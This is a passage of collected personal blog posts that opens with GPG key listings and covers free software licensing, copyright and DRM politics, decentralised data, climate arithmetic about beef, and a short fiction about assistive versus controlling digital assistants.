sub   2048R/39829E5F 2011-10-07 [expires: 2021-08-28]

pub   2048R/A70DA09E 2014-06-16 [revoked: 2016-08-16]
      Key fingerprint = FA7F DA53 89DC 30F0 385B  FC4A EA32 F8E6 A70D A09E
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>

pub   1024D/FE96C404 2002-02-04
      Key fingerprint = 6B05 41F0 94FF 2163 6FBA  2433 3307 469B FE96 C404
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Rollenspieler, Spinner und freiberuflicher Weltenbastler) <arne_bab@yahoo.de>
uid                  Arne Babenhauserheide (Eine selbstbewusste Gesellschaft kann viele Narren ertragen) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Rollenspieler, Spinner, Physikliebhaber, Gurpser und freiberuflicher Weltenbastler) <arne_bab@web.de>
sub   1024R/0BC10548 2010-07-29
sub   1024R/95806B33 2010-07-29
sub   1024g/0136732E 2002-02-04

pub   1024R/FE96C404 2014-06-16 [revoked: 2016-08-16]
      Key fingerprint = A000 B099 C138 B7EE 4C19  1D8F 895D BE4E FE96 C404
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>

  1. Once you have Freenet running, just open this link: USK@V~1bZXDO1YhvvyYoYVivW-GTwqCTqaBovBM2ad7vd2E,XnsG558vT1nDLezaPpN5TGXJqZ73~wb3funZeCLWyeo,AQACAAE/gnupg-attack/0/ (but if you cannot trust this website, better check my long-lived site in Freenet (you can find it in several indexes) for a link to that article. If you happen to get a different link here than what I link on random_babcom, please get in touch! 

If one dozen people will stop eating beef, how much will this help to slow down global warming?

If one dozen people will stop eating beef, this will reduce the yearly global CO₂ emissions by around 48 tons CO₂-equivalent1 (about one quarter of their total emissions, and half their emissions from food).

That’s the equivalent of planting about 48 trees per year, with the assumption of an old tree weighting 1 tonne, half of which is carbon. CO₂ mass is carbon mass times (44 / 12), but an average tree in a forest has less than that, because they don’t start as old trees, so you get roughly 1 ton of net CO₂ absorption from one newly planted tree.

So if you assume that the one dozen people will still live for 50 years without eating beef, they will have done as much good for the climate as if they had planted 2,400 trees. That’s roughly a forest with a size of 5 hectar (assuming 50,000 trees per km²).


  1. For beef part of this CO₂-equivalent is due to methane which has a lifespan of only around 10 years, so the actual improvement isn’t as long-lasting as actually planting a forest: You won’t see much of the methane-reduction after 200 years, but the forest will still hold carbon. So please plant trees

Internet, community cloud foo and control of my own data

Why?

What I miss in the internet is the notion of being able to control what my apps access for data.

Why can’t a chat application just connect to a neighborhood- or community-server, and why can’t the activity-stream come from the people I know — and query only their systems, like jabber does?

Almost all geolocation services should be implementable over direct friend-to-friend connections like jabber, and I don’t really see why my local identi.ca program can’t also get the news from my local jabber contacts.

Or why I can’t set a local info-provider as geolocation source and have a “phone-book” of info-providers in each town.

And when it can do that, why can’t I have a general info-server which serves as synchronization and aggregation service for any of my devices, so all my programs on any device know which sources to use?

And why can’t I tell that server to allow my friends to access a subset of my data — selected by me?

Sadly I assume that the answer is “power”. Google and Apple don’t want to lose their control on synchronization and sharing. Otherwise most of the control and centralization (=moneymaking monopoly) of the internet would fade away.

What?

For example I’d like to be able to select whose information I get, and I’d like to be able to also get the information my friends and their get. Without anyone outside knowing that I access that data (because I ask them directly). And ideally also without me knowing from which of their friends the data originates, but still being able to block those individually.

Then I could allow certain product information providers (=good advertisers) inside my network, so I get news about stuff I might like to spend money on. And automatically get information about the info-providers from my friends — or my community.

And all that without direct dependency on a single company or system.

It would make it infeasible to monopolize the services without making everyone trust you — and having to make sure most people trust you creates a reverse-dependency which could help to keep the information-providers honest.

How?

And I think one key to that is to make that service less like a full-storage and more like update-collecting and synchronization services.

There’s no reason why a synchro-server should keep any data I already pulled to all my devices.

This would be similar to using a Mercurial push-cache of kinds: When I push data to a service, it just stores a bundle against the revision of the data on my least up-to-date device. All my devices can access that bundle, and when all are up to at least a certain state, the now useless data gets stripped out and only the new data remains.

Not yet pulled information could be stored as snapshots, until the first of my devices pulls it. Then it could get replaced by synchronization data — a compressed update-bundle. That would also make sure that incoming data has to be integrated and parsed only once.

http://mercurial-scm.org/

Maybe Akonadi (from KDE) can someday accomplish something like that.

http://userbase.kde.org/Glossary#Akonadi
http://en.wikipedia.org/wiki/Akonadi

PS: Originally this started as a comment to The state of the internet operating system by O’Reilly.

My answers to the Public Consultation on the review of the EU copyright rules.

The following PDF and ODF contains my answers to the Public Consultation on the review of the EU copyright rules.

If you want to comment, please use the contact form.

PS: And now I hear that the commission is trying to get into treaties with Canada (CETA) which make any positive changes to copyright impossible: CETA: Mehr Rechte für Musikkonzerne (german). I signed a petition against CETA (german) - maybe it’s time to march the streets again. But what do we actually need to change to stop these ever repeating attacks on our digital life?

AnhangGröße
2014-03-04-eu-copyright-consultation-document_en-arne_babenhauserheide.odt73.84 KB
2014-03-04-eu-copyright-consultation-document_en-arne_babenhauserheide.pdf323.97 KB

Neither Humble nor Indie Bundle

Update 2016: Later Bundles seem to have gotten better again.

Comment to New Humble Bundle Is Windows Only, DRM Games.

The new Humble Indie Bundle is no longer free, indie, cross-plattform or user-respecting.

When the first bundle had a huge boost in last-minute sales after the devs offered to free the source of 4 of the 5 games, I had hoped, they would keep that. I was one of those who paid when they offered to free the games, and I’m pretty sure that they got a huge boost in people who knew the Humble Indie Bundle due to that.

But when the second bundle did not offer freeing the source, I did not pay. Unfree games aren’t worth much to me and I feared they would go further down that track.

Now Steam comes to GNU/Linux, so being cross-plasform isn’t unique for the Humble Indie Bundle anymore. And they dropped cross-platform support and added DRM. They replaced fans with short-term cash-cows who will happily switch to another project without second thoughts. Somehow I saw that coming…

Well, they sell their brand while it still holds, but by doing that they burn the ones who brought them where they are today.

Never put effort in a project where you have to trust the creator to not misuse it. Free copyleft licenses are a safeguard for contributors - not only the coders, but also for those who promote the project.1


  1. That’s one of the reasons why I put the 1w6 roleplaying game completely under the GPL2 and why we are developing most of the stuff we do in a decentral versiontracking system. It makes it so easy for people to take over in case I should betray them that the benefit I could get from betrayal is small enough that I hope that I can withstand it on the long term. 

  2. 1w6 was freed completely in february 2009 by putting it under GPLv3. Before that it used a custom license, which was free but incompatible with other free works. 

Patent law overrides copyright breaks ownership

Concise and clear.

In patent law, copyright and property there are two pillars: protection and control.

Protection

  • Property: No person shall take that from me.
  • Copyright: No person shall have the same without my permission. A monopoly.
  • Patent Law: No person shall create something similar without my permission. An even stronger monopoly.

Control

  • Property: I decide what happens with this.
  • Copyright: I decide what happens to everything which is the same. Takes another ones property. → a monopoly¹.
  • Patent Law: I decide what happens to every similar thing. Takes the copyright and property of others. → An even stronger monopoly¹.

In short: Patent law overrides copyright breaks ownership.

¹: Others may have copyrights and property rights which they can only exercise with my permission. So effectively all their rights belong to me. If you want a longer argument on this, please read Intellectual Property Is Theft.

(translation of Patentrecht bricht Urheberrecht bricht Eigentum)

Please accept the signatures from the petition against Article 13

Dear Antonio Tajani,

Please accept the signatures from the petition against article 13.1

In 2014 I contributed to the Public Consultation on the review of the EU copyright rules.2

I publish music online, I write online, I publish Free Software, and I share links to news.

Last month I wrote to my representatives in JURI and asked them to preserve internet freedom. 15 of them nontheless voted to destroy online freedom. I cannot understand how they could vote for a system which will enforce the widespread establishment of technologies which can form the foundation for censorship which lets chinese censorship appear like a paradise of free speech.

Therefore I now beg you to accept the signatures from the petition against article 13.

Please let the voices of the European citizens be heard. Please help us preserve the Europe we love.

The best of wishes,

Dr. Arne Babenhauserheide


  1. The petition against Article 13, currently with over 654,000 signatures: https://www.change.org/p/european-parliament-stop-the-censorship-machinery-save-the-internet 

  2. My answers to the public consultation on copyright in the EU: http://www.draketo.de/files/2014-03-04-eu-copyright-consultation-document_en-arne_babenhauserheide.pdf 

Shackle-Feats: The poisoned Apple

Making an ability mandatory which forces you to wear shackles takes your Freedom away

Making an ability mandatory which forces you to wear shackles takes your Freedom away

This is an email I sent as listener comment to Free as in Freedom.

Hi Bradley, Hi Karen,

I am currently listening to your Steve Jobs show (yes, late, but time is scarce these days).

And I side with Karen (though I use KDE):

Steve Jobs managed to make a user interface which feels very natural. And that is no problem in itself. Apple solved a problem: User interfaces are hard to use for people who don’t have computer experience and who don’t have time to learn using computers right.

But they then used that solution to lure people into traps they set up to get our money and our freedom.

As analogy: A friend of mine told me, that Photoshop gives her Freedom, because she can do things with it, which she can’t do with anything else. And she’s right on that: She gets a kind of freedom. But she has to give up other freedoms for that, for example the freedom to do freelancing work without paying 3000€ up front.

To make the problem with that kind of freedom visible, let’s use one more analogy: When I get a flying car with which I can visit the Himalaya without having to get a drivers license, then I just got the Freedom to actually visit Himalaya. But sadly that car comes with a rule, that I am not allowed to take friends with me, and it does not allow me to drive into cities ruled by left-wing politicians. It costs so much, that I can’t afford another car1, so now if I want to be able to visit Himalaya, I can never take friends with me even when I don’t want to go to Himalaya right now, just to the next shop, and I can’t visit left-wing friends.

That car would give me a kind of Freedom, but it would take away other freedoms I had before I used it. If all people used it, the effects would be horrible, and not just for left-wings and car owners: You would not be able to get a ride from a neighbor when you needed to get to the doctor fast.

Now imagine what would happen, if people would find ways to make money with that flying car. They would create a society, where you have to give up Freedom if you want to get one of the good jobs.

So creating a new kind of Freedom and coupling it with heavy shackles does not give you more Freedom. It creates a situation where people have a harder time living their life when they want to keep their basic freedom, because those shackle-feats become mandatory.

Apple kinda invented the shackle-feat “use shiny computers without understanding them”.
They managed to make shackles almost mandatory for parts of society by creating a pressure on people that they have to be able to do the feat, so they have to accept the shackles.

Now we have to recreate that feat without the shackles so people are able to keep up without losing their freedom. We have to do additional work, because society is being shaped by those who made the shackles.

Best wishes,
Arne Babenhauserheide

PS: Steve Jobs managed to create really nice interfaces. Sadly he used his abilities to shackle people. He once was a hero to me. Even today there is stuff he did that I admire. But he decided to use his abilities for shackling people.


  1. Or it is so different from other cars, that using it for some time makes it necessary for me to relearn other stuff, so using any other car requires a high relearning effort. And for most people, time is as scarce as money. 

The ease of losing the spirit of your project by giving in to short-term convenience

Yesterday I said to my father

» Why does your whole cooperative have to meet for some minor legalese update which does not have an actual effect? Could you not just put into your statutes, that the elected leaders can take decisions which don’t affect the spirit of the statutes? «

He answered me

» That’s how dictatorships are started.«

With an Ermächtigungsbescheid.

I gulped a few times while I realized how easy it is to fall into the pitfalls of convenience - and lose the project in the process.

An answer to tanto in Sone (Freenet - official site)

Steve Jobs, Get Your Head out Of the Sand! - Broken Apple Heart

Dear Steve,

Do you understand that imposing Digital Restrictions Management (DRM) is unethical? That attempting to control our computers and electronic devices to monitor what we do with digital files is wrong and a danger to society?

The problem for DRM proponents is that DRM doesn't work as advertised - and you are helping perpetuate a lie. We know you know this, you've said as much about music and DRM yourself. So why do you persist in touting DRM for video?

What DRM does do is trample my rights and create a situation where, if I were to circumvent a DRM scheme to be in control of my computer, it would be a criminal act - thanks to legislation like the Digital Millennium Copyright Act (DMCA).

So what does DRM do? It monitors what I do, Often, it reports on my activities to a central authority. It locks me to one vendor of software. It limits what I do with the stuff i own. Yet Apple takes advantage of DRM to gain exactly this kind of control over its customers doesn't it?

We don't want DRM! We do want our music and video in formats free from proprietary restrictions. And we want the devices we buy to be under our control.

Do you still have Apple's head stuck in the sand?
I'm writing to suggest you take it out.
- http://defectivebydesign.com

Personal Comment:
I've been a Mac User my whole life. I left you with a broken heart, when you used the TPM chip to lock down _developer_ Macs.

Now I'm a GNU/Linux user (KDE), and even though I sometimes think back to Macs, to Shufflepuck (my first addiction), to professional video editing (With my old 66Mhz Mac), to the 6 months when I tried every beta of MacOSX even though my 266Mhz G3 was far too slow to render it in speed, and to the ease of music production on my Flat-Panel iMac, I won't come back to have my freedom taken.

You're creating great computers. Why do you still have to make them a tool for digital slavery, even though you now aknowledged yourself, that this slavery is bad?

The one who acts bad but doesn't know it, is a fool.
The one who acts bad and knows it, is a criminal, regardless of the laws.

Disappointed wishes with but a glimpse of hope,
Arne Babenhauserheide - Broken Apple Heart (german)

Thank you for your Flattr’s! | Danke für eure Flattr! | Dankon por vian Flattrn!

It’s always a great feeling to see a flattr - Thank you for your support!
You can find new free works for you enjoyment on draketo.de (infrequent and bursty) and 1w6.org (currently weekly but mostly in German).

ArneBab on Flattr

Es ist ein tolles Gefühl, geflattrd zu werden - Danke für eure Unterstützung!
Neue freie Werke von mir findet ihr auf draketo.de (unregelmäßig) und 1w6.org (zur Zeit wöchentlich).

ArneBab auf Flattr

Mi ĝojegas ricevi novan flattrn - Dankon por subteni min!
Nova verkoj estas en draketo.de (ne-regula) kaj 1w6.org (nuntempe ĉiusemajna, sed en la germana).

ArneBab en Flattr

Best wishes,
Liebe Grüße,
Kore,
- Arne alias Drak

PS: This month I got >6€ via Flattr - 80% of my server costs.
_   Diesen Monat habe ich >6€ über Flattr bekommen - 80% der Serverkosten.
_   Tiu monato mi ricevis >6€ de Flattr - 80% de la kostoj por la servilo.

The assisted brain and the chained brain

PDF (to print)

Org (to change)

Who serves whom? Our tools can be our allies or our masters. Do your tools assist or chain?

Lisa

Good morning, Lisa. Your group rescheduled the meeting, so you should get up early today. Do you want a suggestion for rescheduling your workplan to optimize for your biorhythm?

Yes, please. Use the “we had great sex” mode. I’d like fried eggs today, please search for a recipe.

What about “flaming chicken fun”? It’s a favorite of Marta and Dave.

Sounds good. is there anything urgent today?

Dave asked to upload your plan to moogle sheat again. Shall I send him the public data?

No. Just send him a message “you can have all my data, but I don’t give it to moogle. Just come over at six”

This sounds like an appointment at six. But your schedule today ends at 7. Shall I adapt the schedule?

Yes, adjust it.

“You can have all my data, but I don’t give it to moogle. Just come over at six”, is that correct?

Yes. Send it, please.

Dave

Good morning, Dave. Your group-leader rescheduled the meeting, so you have to get up early today. Shall I reschedule your workplan to maximize your healthcare bonus?

Yes, please. Use the “latenight workout” profile.

I can’t do that, Dave. The “latenight workout” profile requires a workout token, but you met with Lisa who does not have a latenight-account. Your biosignals meet the criteria for “latenight workout”, though. Shall I request individual validation?

No! Just use the usual profile. And search for a recipe with fried eggs.

I can’t do that, Dave. You already bought ice cream yesterday. Ice cream and fried eggs without workout would violate your employee contract. May I suggest orange juice and a salad?

So be it. Is there anything urgent today?

Lisa replied to your request for her plan.

What request?

You asked for her plans, so I sent a request for uploading them. Fapple flagged her answer as aggressive and sleazy. Do you still want to read it?

Not yet. Notify me again after breakfast.

I can’t do that, Dave. Re-notification for aggressive messages makes users unhappy. If you do not read it, it will be deleted in 7 days.

Then say it.

Lisa says “you can have all my data, but I don’t want to give it to moogle. Just come over at six.” I filed a potential appointment at six in your moogle sheat. Do you want to acknowledge it?

Yes, please.

AnhangGröße
assist-or-chain.pdf92.43 KB
assist-or-chain.org2.78 KB

The danger of promoting dead closed clients

I had a strange feeling about people advertising the dead and closed source Gnutella client BearShare, but I only found one of the reasons for that gut feeling today.

Assumptions I use: We want Gnutella to continue to evolve and grow better.

To have Gnutella evolve, the developers of actively developed clients need feedback (and be it only encouragement).

If people now use a dead client, which won't evolve anymore, they don't provide essential feedback to actively developed clients, and it might even happen, that some developers waste time on trying to hack the dead client to make something work (again), instead of contributing to an active open client.

So every user who uses a dead closed client instead of an active open (and free licensed) client hinders the evolution of Gnutella.

That's not the fault of the user, and it's not per se damaging to the current state of the network (as long as the user shares, he contributes to the availaable files), but on the long term it hinders Gnutella from becoming better.

And that in mind, promoting a closed dead client directly damages Gnutella.

I know I'm human and as such prone to errors, so if you see anything I overlooked, please tell me about it.

The dynamics of free culture and the danger of noncommercial clauses

NC covered works trick people into investing in a dead end

Free licensing lowers the barrier of entry to creating cultural works, which unlocks a dynamic where people can realize their ideas much easier - and where culture can actually live, creating memes, adjusting them to new situations and using new approaches with old topics.

But for that to really take off, people have to be able to make a living from their creations - which build on other works. Then we have people who make a living by reshaping culture again and again - instead of the current culture where only a few (rich or funded by rich ones) can afford to reuse old works and all others have to start from scratch again and again.

Sharealike licensing gives those who allow others to reuse their works an edge over those who do not do that: They can access many resources early in their career which allow them to produce high-quality stuff without needing to pay huge amounts up front. And they hone their skills in working with free stuff. So when they become good enough that they can work in art for a living, they are deeply invested in free culture, so they have very good reasons for also licensing their new works under free licenses.

As a real-life example for the dynamic of free licensing, I’ve been working on a free tabletop roleplaying system in my free time for the last 10 years. For 3 or 4 years now it has been licensed under the GPL, so we could use images from Battle for Wesnoth in our books. And 2 years ago, I worked together with another roleplayer to create minimal roleplaying supplements on just one Flyer - where only half the images were from Battle for Wesnoth, because a great artist decided to contribute (All hail Trudy!).

All this would have been possible with NC licensing.

But about 2 months ago a roleplayer from a forum I discuss at unveiled his plans to create a german free rpg day and I realized that our minimal RPG would be a great fit for that - but that I could not afford myself to print it in high enough numbers and good enough quality to reach many people.

So I worked on the design and text to polish them, and when I was happy I started a 4-day fundraiser to finance printing the RPGs. Within just those 4 days I got over 200€ in donations which allowed me to print 2000 RPGs in great quality along with supplements and additional character cards which made every single RPG instantly playable - instead of 1500 RPGs with only one card so people would need 3 RPGs to actually play.

And this would have been plain illegal with NC material.

It is not yet “making a living with free art”, but it is a first step out of the purely hobby creation into a stronger dynamic. One which allows us to bring 2000 physical RPGs to people without going broke - and more importantly: One which started small and can grow organically.

An RPG might not be the best example here, because tabletop RPGs are notoriously bad for generating money. But it is the example I experienced myself.

As an example which might be closer to you: Imagine that you created a movie with free music and other material from free licensed works. Imagine that half of the visuals you use could have already been created - maybe for some other movie. By using free stuff, you could save half the effort for creating the movie.

But if that other stuff had been NC, you would not be allowed to start a fundraiser for getting it to blu-ray quality - at least not without replacing all NC parts, which would have added a high cost to be able to increase your outreach. Likely it would have been a blocking cost. It would have been easier to just create a new project than to polish the one you have to reach more people.

And polish is what allowed me to move the RPG from just being a hardly readable PDF to a work I can look at with pride.

To wrap it up: Free culture - just like free software - allows people to take little steps into creating culture and to move organically from just being a hobby artist towards making a living from their work - and spreading their work to many more people.

NC covered works on the other hand trick people into investing in a dead end, because they can never move beyond being a hobbyist without huge investments which bring no other benefit than recreating what they could directly use when they did not try to make a living. It’s like learning to use Photoshop and then realizing that you aren’t allowed to earn a little extra by improving wedding-images without shelling out 3000€ for a creative suite license. And that means, that you can’t move in small steps from a boring day job to a professional creative life.

(written in reply to a question from Keith, one of the makers of Software Wars, a movie about free software which is trying to fund going to a high-quality blu-ray release at the moment)

(also see Noncommercial doesn’t compose)

The effect of the optional restrictions of the GPLv3

I just thought a bit about the restrictions the GPLv3 allows, and I think I just understood their purpose and effect for the first time (correct me, if I'm wrong :) ).

What are the restrictions?

The GPLv3 allows developers (=copyright holders) to add selected restrictions, like forbidding the use of a certain brand name or similar.

The catch with them is, that any subsequent developer who adds anything is free to simply strip off the restrictions.

What is their effect?

Now I wondered for a long time, what that really gains us. today I then realized that subsequent develoeprs are only free to strip off the restrictions, as long as that doesn't violate any license of some part of the program.

That means, the GPLv3 restrictions simply have the effect of adding compatibility to other licenses, while keeping the option to strip off any restriction, when you replace the part under the other license with a more liberal licensed part.

So this doesn't place any additional burden on packagers, because they already have to check those other licenses for their restrictions. Now the GPLv3 description of the whole package clearly states what additional restrictions are inferred by the parts which are under different but compatible licenses.

While those parts where under seperate licenses before (and had to be checked), they can now be impcoved with GPLv3 code with additional restrictions.

And as soon as the GPLv3 code can stand on its own feet, the more restrictive licensed part can be replaces with GPLv3 code, and the restrictions can be removed again, making the work of the packagers easier.

Better still, the GPLv3 shows clearly the sum of all restrictions of the individual (differently but compatible licensed) parts, so packagers only need to check the GPLv3 license information to see all restrictions in a standardized format (GPLv3 additional restrictions).

Example

Let's assume I find this great piece of software which says "do what you want but don't touch my brand", and I want to build my GPLv3 program on it. Let's call the piece of software "foo". So I just begin coding and use the GPLv3 for my parts (simply copyright message in my code files). For the whole package I add a license information ("license.txt" or "COPYING" or similar) which give the information

  "This program is licensed under the GPLv3 
  with the additional restriction that the brand 
  'foo' may not be used for derived products. 
  The additional restriction is inferred by the package foo.

  (plus license mumbo jumbo you can find at and copy 
  from http://gnu.org/licenses/gpl.html)"

Now someone else takes my program and improves it. But he also uses the package "blah" which also says that it's brand must not be violated. Now the combined license would be:

  "This program is licensed under the GPLv3 
  with the additional restriction that the brand 
  'foo' and the brand 'blah' may not be used for 
  derived products. 
  The additional restriction for brand 'foo' is inferred by the package foo.
  The additional restriction for brand 'blah' is inferred by the package blah. 

  (plus license mumbo jumbo you can find at and copy 
  from http://gnu.org/licenses/gpl.html)"

So now a group of free software activists takes offense at the restrictions. They don't want anyone to be restricted by copyright from using a brand. One reason could be that the brand protection was voided by some trademark action.

Now they can't just say "that brand isn't protected anymore", since the protection was reinforced by copyright law.

But they can just replace the parts under the more restrictive licenses with honest GPLv3 licensed parts - either by writing them or by finding a drop-in replacement. Now let's suppose they write the packages "bar" and "baz" which implement the functionality of "foo" and "blah". They now no longer use any parts under licenses which require additional restrictions, so they are free to remove them. As they release their package, the license information might read as follows:

  "This program is licensed under the GPLv3.  

  (plus license mumbo jumbo you can find at and copy 
  from http://gnu.org/licenses/gpl.html)"

If they are nice (and we assume they are) their changelog will also contain a line saying something like "replaced 'foo' and 'blah' which allowed us to remove the additional license restrictions to avoid using the brands 'foo' or 'blah'."

Final remark

As you see (and if I understand it correctly), the additional restrictions can be a great tool for freeing software from restrictions, because they allow you to combine GPlv3 code with somewhat restrictive licensed code and get rid off the restrictions later by replacing the more restrictive licensed parts.

And since the only allowed additional restrictions are those which don't harm the four freedoms of free software, you can still make sure that you use ethically sound software by simply checking whether it is GPL licensed.

So kudos to the designers of the GPLv3. They did such a great job that it took me two years to realize one of the many powerful tools they gave us with the GPLv3 - and I did take part in the public discussion of the GPLv3 since draft 1 (but I never watched a GPLv3 speech...).

Also, since the GPLv3 allows combination with the AGPLv3 software (which adds the restriction, that the source code must also be supplied when the software is used over a network), it gives us a clear path into the future where people might use more and more software "as a service", so it doesn't get executed on their local machine and the normal GPL alone isn't enough to protect our freedom.

The generation of cultural freedom

New version of this article: draketo.de/politik/generation-of-cultural-freedom.html

I am part of a generation that experienced true cultural freedom—and experienced this freedom being destroyed.

We had access to the largest public library which ever existed and saw it burned down for lust for control.

I saw the Napster burn, I saw Gnutella burn, I saw edonkey burn, I saw Torrentsites burn, I saw one-click-hosters burn and now I see Youtube burn with blocked and deleted videos - even those from the artists themselves.

Not even for greed or gain, because enough studies showed that we did no damage and that we actually paid more for cultural goods than those who did not enjoy that freedom.1 They fought for control over us.

And the loss of cultural freedom is only the precursor for the loss of personal freedom, as many new censorship laws show.

Feel free to share this text under cc by: Creative Commons License


  1. Burning down filesharing services has nothing to do with earning more money. In 2007 the limited data available to social scientists was still too sparse to allow distinguishing the effect of filesharing from zero, as published in the Journal of Political Economy (german article). In 2012 a study from the Music Industry showed that users of filesharing networks pay 50% more for media (german article) than those who do not use filesharing (and killing Megaupload reduced the sales!). So if this were about money, the media would cheer for filesharing networks and simply do media campaigns which say “If you enjoy music, pay the artists, so they can create more of the works you love!”. The real reason why they fight filesharing is that the internet breaks the dominance of the ruling class over information (german article) and allows artists and fans to come together without paying bridge toll (the final german article I reference here ☺). Killing our most efficient ways to share culture has nothing to do with financing artists, but everything with regaining control of the information channels. Filesharing networks are an uncontrolled distribution and communication channel. And those who want control over us will not stop just because we show them that their actions harm artists. The only way to stop them is to make it so expensive to control us - in terms of money and in terms of political influence - that pushing their agenda against free communication would put their power in other areas of society at a severe risk. 

AnhangGröße
generation-of-cultural-freedom.png63.64 KB

The internet means unlimited copying. What we make of it depends on us

Comment to is the web too good for us on a BBC blog:

But the web was not really free in the beginning. While its structure was open for everyone and websites bloomed and blossomed by copying code and design from others, the content of sites stayed closed by copyright.

There were many thoughts of freedom in the original web, but the structure gave more freedom than the law, and the easy copying inside the new medium still didn't reach the slow legal body of our offline communities.

Online, though, laws were first ignored, then bent and finally used to create new rules within the laws themselves.

Thus came free software a quarter of a century ago, even before the web spread its basic property of cheap infinite copying into the mainstream society, when coders realized that the traditional copyright didn't fit their way of cooperating and curtailed their creative work. Free Software spread and became the base and foundation of todays internet infrastructure, with Apache webservers on GNU/Linux computers serving its content - unbeknown to most of its users.

And from the same spring came creative commons, about 20 years later, used by artists who realize that the traditional rules do more harm than good to them.

The new digital world began before the internet was started by making the copy an integral part of even looking at data, but it grew with the internet which pushed the effects of this new technology right into the face of our societies. And so the digital world which currently finds its most well known expression in the internet is an ownership breaker by design, and many battles were fought over this most beloved and most hated feature.

You can no longer control what people do with things you put into the internet, as long as you allow them to see them. Once they saw them, if even for a moment, they could have a copy. You can only use social rules to keep them from passing on their copies, or take over their computers.

Even while I write this comment, I don't do it on your website. I write it in a local copy of your website which is stored by my browser, and I could go on writing it long after your website disappeared, as long as my computer kept the copy.

The only way around this is to go back to the analog age, where showing doesn't equal handing out a copy, or to allow some entity complete control over our computers to enforce certain rules - and over our lives which more and more move towards the digital space.

To come back to the question: The web is not too good for us. It provides more openness than many people want to provide, and far more than the law offers, but this openness gave rise to movements which shaped the openness into freedom by establishing the rule that whatever is freed must never be shackled again. They took the single inherent freedom of copying and added the freedoms of changing and using. From that source came free software which drives the internet and the Wikipedia which provides the worlds largest publicly accessible knowledge base. Creative Commons walks a similar path by always allowing the copying of the creative works, but it allows for much more control by the creator.

The internet removes the restriction on copying which is inherent in our analog world. Our societies and legal systems, though, will take time to adapt. If we're lucky they'll accept the internet as freedom and adapt as free software and the wikipedia did. If we're unlucky they'll try to limit the openness, either through technology or through laws. They could turn that openness from an openness for people into an openness of people, because copying doesn't only go one direction. They can just as well copy a record of every move me make and use this to create an almost perfect surveillance system with all its implications on freedom.

And they wouldn't necessarily need to establish rules based on punishment which we currently have as laws. They could just as well use digital shackles, which not just disallow some action, but make it impossible. The rules could be like a car which makes it impossible for me to drive faster than the law allows while my child bleeds to dead on the backseat.

So the web is neither good or bad. It's simply a world which operates on slighly different rules than the physical world, and we're still in the process of learning the implications, promises and dangers of that tiny change of rules.

The princess is the ultimate representation of social and hierarchical power

Knight, do my bidding.

A girl told my son “I’m a princess, you’re a knight, fetch me a glass of water!”. It was then that I realized that a princess typically isn’t someone to save. I was so proud of my son when he said “no”, because I suddenly realized how hard it is to escape the shackles of that special story.

A princess is the one person in the country, who reigns surpreme in both hierarchy and social standing. People in stories might hate the king, but the princess is beloved by most. Remember princess Diana. In life she was a role model, and her death moved most people in Europe. No one in his or her right mind would admit killing her, not even among close friends. This is different with a king: You can kill a king and still keep your friends. But a princess is out of reach.

The princess might be seen as tragic -- having to sacrifice love for the good of the kingdom -- but she is still out of reach to any man. And she can destroy any person with a mere accusation. The one who insults a princess is condemned both by the power of the state and by society.

The only capability a princess in stories lacks is physical force, and the only way a man outside royalty can be more to the princess than a servant, is saving her from some horrible fate. Since she reigns surpreme in everything but physical force, this fate will have to be fought by physical strength.

The power she uses is indirect: The princess in stories did not create her power, she inherited it. But this does not mean that it is not real: If the king is not depicted as evil, then the guards are loyal to the princess, and this loyalty is real power.

This is why it felt strange to me when people celebrated stories in which the princess also wielded physical power as an inversion of the archetype of a princess needing to be saved. Making her also physically strong made her the most powerful person on every level. But it did not invert power. Instead it just increased the concentration of power.

An inversion of power would have been to tell a story of the cleaning maid who trained in secret to become a guard and who finally saved and married the fair and friendly and handsome and harmless prince. The end result would have been the same: A queen who wields both physical, social and hierarchical force. But the path would have been one of a strong woman who makes her own path.

Please sit back for a moment and imagine that story. Then come back in 5 minutes. If you have a clock at hand, please check the time, then take 5 minutes to let your imagination flow.

… 5 minutes later …

How does it feel to see the woman at the bottom train to fight her way up? How does it differ from the princess who gets trained by her personal guard?

The archetype of the royal prince in shining armor, fair and strong and beloved by everyone, has mostly disappeared. We rarely have these stories nowadays, because they are much less interesting than stories about people who have weaknesses, and because so many real royal princes hugely underperformed compared to the archetype. And writers in the past century worked a lot to dispell hierarchy and the story of the good and noble king with the inherited right to rule. Nowadays we ask why someone should have the right to rule others.

If these stories which glorify hierarchy come back with the martial arts princess, that does create a female version of the archetype of the royal prince saving the world, but it does not reverse the archetype of the knight saving the princess. Instead it uses a weakened version of equality as excuse to bring back justifications for hierarchy.

However this does not mean you should not tell stories of martial arts princesses, if you like them.

Those stories might actually be pretty cool, and might capture the imagination of a whole generation, as Street Fighter did with Chun Li (though she wasn’t a princess), or Starcraft did with Kerrigan1, or Alien did with Ripley. If you have a millionaire with super-human strength and extreme intellect saving people from the shadows (yepp, Batman), there’s no reason not to have a princess who takes up the good fight.

Also what I call the martial arts princess here is not the princess who rebels against her upbringing and is ready to give up her power for freedom. That is a genuine story of liberation. The martial arts princess is about just adding physical power to social and hierarchical power (as most magical girl princess anime stories do2).

But stories of martial arts princesses won’t get my cheers for being on the forefront of equality. They might get my cheers for being great stories, but my cheers for equality are reserved for stories of women who make their own paths without strengthening the chains of existing hierarchy.


  1. Kerrigan from Starcraft 1 could be described as adopted renegade warrior princess, later betrayed by her king, and finally ruler of the swarm as the queen of blades thanks to her own sheer force of will, strategic brilliance, and ruthlessness. 

  2. I like anime a lot, but that does not get me to ignore problems that are common in anime. 

The translation of NSA is Stasi

Just to give you a short note, if you have been surprised by the NSA acting like the Stasi in former DDR (German Democratic Republic).

Here’s the translation of NSA:

  • N: National = Staatlich
  • S: Security = Sicherheit
  • A: Agency = Ministerium

Let’s put that together:

NSA = Staatliches Sicherheitsministerium
(in more regular German: Ministerium für Staatssicherheit)

Well, that’s long. Shorten it to Staatssicherheit. Still to long for casual discussions. So shorten it once more: Stasi.

NSA = Stasi

Do you still wonder why the NSA acts like the Stasi?

The “Apple helps free software” myth

→ Comment to “apple supports a number of opensource projects. Webkit and CUPS come to mind”.

Apple supports a number of copyleft projects, because they have to. They chose to profit from the work other people released as copyleft, and so they are obliged to release their improvements.

Webkit

